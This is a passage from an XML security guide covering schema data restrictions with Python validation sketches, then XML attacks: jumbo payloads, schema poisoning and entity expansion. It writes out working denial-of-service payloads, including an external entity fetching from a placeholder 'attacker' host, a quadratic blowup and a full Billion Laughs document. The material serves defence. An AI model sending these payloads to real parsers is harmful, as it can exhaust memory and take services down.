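    if not value.is_finite():
        raise ValueError("special value rejected: " + repr(text))
    return value
```

Here an input such as &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt; raises a &amp;lt;tt&amp;gt;ValueError&amp;lt;/tt&amp;gt;, while an ordinary price such as &amp;lt;tt&amp;gt;19.99&amp;lt;/tt&amp;gt; is returned as an exact decimal value.&lt;br /&gt;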
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid.&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights have only three colors, only 12 months are available, and so on. The schema can put these restrictions in place for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called an &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element &amp;lt;tt&amp;gt;month&amp;lt;/tt&amp;gt; to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
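&lt;br /&gt;
The whitelist idea can be mirrored in application code. This minimal Python sketch assumes a hypothetical helper named &amp;lt;tt&amp;gt;is_valid_month&amp;lt;/tt&amp;gt; and performs the same exact, case-sensitive comparison that an enumeration performs.&lt;br /&gt;

```python
ALLOWED_MONTHS = frozenset([
    "January", "February", "March", "April", "May", "June",
    "July", "August", "September", "October", "November", "December",
])


def is_valid_month(value):
    # Exact, case-sensitive membership test, like an enumeration facet.
    return value in ALLOWED_MONTHS
```

Any string outside the set, including a differently cased month name, is rejected.&lt;br /&gt;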
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When valid values must have one exact length (for example, 8), the &amp;lt;tt&amp;gt;length&amp;lt;/tt&amp;gt; restriction can be used instead:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
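&lt;br /&gt;
For comparison, the two length restrictions above can be approximated in application code. The Python sketch below uses a hypothetical function name, &amp;lt;tt&amp;gt;has_valid_length&amp;lt;/tt&amp;gt;, and assumes that counting Python string characters is an acceptable stand-in for the way a schema processor counts characters.&lt;br /&gt;

```python
def has_valid_length(value, min_length=3, max_length=256):
    # True when the number of characters lies between min_length and
    # max_length, both inclusive.
    return len(value) in range(min_length, max_length + 1)


def has_exact_length(value, length=8):
    # An exact length is the special case where both bounds are equal.
    return has_valid_length(value, length, length)
```

The defaults repeat the values used in the schemas above: 3 to 256 characters for the ranged check, and exactly 8 characters for the fixed-length check.&lt;br /&gt;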
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only values between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed for an SSN.&lt;br /&gt;
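&lt;br /&gt;
The same pattern can be checked in application code. The Python sketch below uses a hypothetical helper, &amp;lt;tt&amp;gt;is_valid_ssn&amp;lt;/tt&amp;gt;, and assumes the input has already been trimmed, since it does not reproduce the whitespace handling of the &amp;lt;tt&amp;gt;token&amp;lt;/tt&amp;gt; data type.&lt;br /&gt;

```python
import re

SSN_PATTERN = re.compile(r"[0-9]{3}-[0-9]{2}-[0-9]{4}")


def is_valid_ssn(value):
    # Schema patterns must match the whole value, so fullmatch is used
    # here rather than search or match.
    return SSN_PATTERN.fullmatch(value) is not None
```

Using a full match matters: a partial match would accept values that merely contain a well-formed SSN somewhere inside a longer string.&lt;br /&gt;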
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components, available since XML Schema 1.1, constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed.&lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An alternative would consider valid the entire range of integers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Not defining a maximum number of occurrences leaves the application to cope with the consequences of receiving an extreme number of items to process. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;0&amp;lt;/tt&amp;gt;, and if there is no limit on the maximum number, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to process. Since computational resources are limited, the consequences should be analyzed, and a maximum number should eventually be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
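&lt;br /&gt;
When the schema cannot be changed, a limit can still be sketched in the code that consumes the parsed items. The Python example below is a hypothetical illustration: the name &amp;lt;tt&amp;gt;take_bounded&amp;lt;/tt&amp;gt; and the limit of 1000 are assumptions, and the limit would have to be tuned for each application.&lt;br /&gt;

```python
from itertools import islice

MAX_BUY_ELEMENTS = 1000  # hypothetical limit, to be tuned per application


def take_bounded(items, limit=MAX_BUY_ELEMENTS):
    # Reads at most limit + 1 items, so an oversized input is rejected
    # without being fully consumed first.
    taken = list(islice(items, limit + 1))
    if len(taken) == limit + 1:
        raise ValueError("too many occurrences")
    return taken
```

Because the function stops reading one item past the limit, it also terminates on an input stream that never ends.&lt;br /&gt;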
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;soapenv:Envelope xmlns:soapenv=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot; xmlns:ext=&amp;quot;http://com/ibm/was/wssample/sei/echo/b2b/external&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;soapenv:Header LARGENAME1=&amp;quot;LARGEVALUE&amp;quot; LARGENAME2=&amp;quot;LARGEVALUE&amp;quot; LARGENAME3=&amp;quot;LARGEVALUE&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ENTITY file SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;file;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing any type of data to be sent to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document; to be used safely, there must be a way to check the integrity of the embedded schema.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
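&lt;br /&gt;
A deployment check for this condition can be sketched as follows. The Python example assumes a POSIX filesystem, and the helper name &amp;lt;tt&amp;gt;is_writable_by_group_or_others&amp;lt;/tt&amp;gt; is hypothetical; it reads the same permission string that the listing above shows.&lt;br /&gt;

```python
import os
import stat


def is_writable_by_group_or_others(path):
    # stat.filemode renders the mode like a directory listing does,
    # for example "-rw-rw-rw-". Index 5 is the group write flag and
    # index 8 is the write flag for all other users.
    mode_text = stat.filemode(os.stat(path).st_mode)
    return mode_text[5] == "w" or mode_text[8] == "w"
```

A schema file for which this function returns true could be altered by accounts other than its owner and deserves review.&lt;br /&gt;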
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker could sniff the connection and modify the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, example.com resolves to the IP address 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; references another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is in turn defined as entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the schema describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
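&lt;br /&gt;
The arithmetic behind this attack can be worked through with a short Python sketch. The figures are the ones used in the example above; the variable names are illustrative, and the few dozen characters of DTD wrapper around the payload are ignored as an approximation.&lt;br /&gt;

```python
ENTITY_LENGTH = 100_000    # characters in the single entity A
REFERENCE_COUNT = 100_000  # references to A in the document body
REFERENCE_LENGTH = 3       # an ampersand, the name A, and a semicolon

# Characters the attacker has to send, ignoring the small DTD wrapper.
sent_chars = ENTITY_LENGTH + REFERENCE_COUNT * REFERENCE_LENGTH

# Characters the parser holds after expanding every reference.
expanded_chars = ENTITY_LENGTH * REFERENCE_COUNT

amplification = expanded_chars // sent_chars
print(sent_chars, expanded_chars, amplification)
```

Under these assumptions, a document of roughly 400,000 characters expands to 10,000,000,000 characters, an amplification factor of about 25,000.&lt;br /&gt;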
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 references to &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt; that it contains; then each of these will be resolved as 10 references to &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt;, and so on. Finally, the CPU and/or memory will be affected by expanding the resulting 10^9 copies of the string &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, a total of 3*10^9 (3,000,000,000) characters, which could make the parser crash.&lt;br /&gt;
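&lt;br /&gt;
The exponential growth can be checked with a small Python sketch. The function name &amp;lt;tt&amp;gt;expanded_characters&amp;lt;/tt&amp;gt; is hypothetical; its defaults correspond to the nine levels of ten references used in the document above.&lt;br /&gt;

```python
def expanded_characters(levels=9, fanout=10, base_text="LOL"):
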